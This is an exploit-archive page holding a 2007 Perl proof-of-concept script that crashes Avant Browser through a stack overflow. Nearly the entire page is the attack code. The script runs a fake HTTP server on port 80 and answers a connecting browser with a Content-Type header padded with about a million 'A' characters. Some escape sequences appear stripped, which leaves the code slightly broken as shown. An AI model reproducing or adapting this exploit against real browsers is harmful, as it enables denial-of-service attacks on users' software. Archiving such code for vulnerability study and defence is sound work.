[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Avant Browser <= 11.0 build 26 Remote Stack Overflow Crash Exploit
# Published : 2007-03-18
# Author : DATA_SNIPER
# Previous Title : FTPDMIN 0.96 (LIST) Remote Denial of Service Exploit
# Next Title : TFTP Server 1.3 Remote Buffer Overflow Denial of Service Exploit
#!/usr/bin/perl
# Avant Browser (ALL Version) Remot Stack OverFlow (Crash)
# Discovered by DATA_SNIPER
# Usage:
# connect from Avant browser to http://127.0.0.1/
use IO::Socket;
my $sock=new IO::Socket::INET (
Listen => 1,
LocalAddr => 'localhost',
LocalPort => 80,
Proto => 'tcp');
die unless $sock;
$huge="A" x 1034985;
$|=1;
print "==========================================================================n";
print " Avant Browser (ALL Version) Remot Stack OverFlow (Crash)
";
print " Vulnerability Discovered by DATA_SNIPER
";
print " GreetZ To:Hacking Master,Dear Devil,Xodia,JASS,All Algerian Hackers n";
print " Mail me at:Alpha_3(at)hotmail(dot)comn";
print "==========================================================================n";
print"[+] Http server started on port 80... n";
print"[+] Try To Explorer http://127.0.0.1/ n";
$z=$sock->accept();
print"[+] Connection Accepted!n";
do
{
$ln=<$z>;
print $ln;
chomp $ln;
if (($ln eq "")||($ln eq "n")||($ln eq "r"))
{
print"[>]Sending Evil Packetn";
print $z " HTTP/1.1 200 OKrnServer: bugs 3.1.02rnContent-Type:$hugernConnection: closernrn";
close($z);
exit;
}
} while (true);
# www.Syue.com [2007-03-18]